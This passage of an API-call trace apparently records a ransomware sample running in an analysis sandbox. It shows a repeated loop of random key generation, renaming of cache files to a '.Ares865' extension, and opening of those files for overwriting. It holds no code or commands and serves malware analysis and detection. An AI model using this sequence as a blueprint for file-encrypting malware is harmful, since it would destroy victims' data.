out: pbBuffer=0x2ccce68) returned 1 [0110.013] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.016] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.017] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.017] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.Ares865") returned 156 [0110.017] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.ares865"), dwFlags=0x1) returned 1 [0110.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.019] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0110.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.019] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.019] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.020] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.020] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.023] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.023] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.024] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.024] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.Ares865") returned 156 [0110.024] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.ares865"), dwFlags=0x1) returned 1 [0110.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.026] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0110.026] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.026] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.026] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.026] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.027] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.027] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.029] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.030] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.030] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.Ares865") returned 156 [0110.031] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.ares865"), dwFlags=0x1) returned 1 [0110.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.032] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0110.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.033] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.033] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.033] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.036] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.037] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.037] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.037] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.Ares865") returned 156 [0110.037] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.ares865"), dwFlags=0x1) returned 1 [0110.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.039] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=386) returned 1 [0110.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.039] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.040] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.040] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.043] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.043] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.043] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.044] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.Ares865") returned 156 [0110.044] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.ares865"), dwFlags=0x1) returned 1 [0110.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.045] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0110.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.046] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.046] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.047] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.047] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.049] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.050] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.050] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.051] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.Ares865") returned 156 [0110.051] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.ares865"), dwFlags=0x1) returned 1 [0110.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.052] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=384) returned 1 [0110.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.053] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.053] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.057] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.058] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.058] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.058] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.Ares865") returned 156 [0110.059] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.ares865"), dwFlags=0x1) returned 1 [0110.060] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.060] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=392) returned 1 [0110.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.060] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.060] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.061] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.061] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.064] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.064] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.064] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.065] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.Ares865") returned 156 [0110.065] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.ares865"), dwFlags=0x1) returned 1 [0110.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.067] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=392) returned 1 [0110.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.067] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.067] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.068] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.068] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.071] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.071] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.071] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.Ares865") returned 156 [0110.072] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.ares865"), dwFlags=0x1) returned 1 [0110.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.074] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=406) returned 1 [0110.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.074] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: 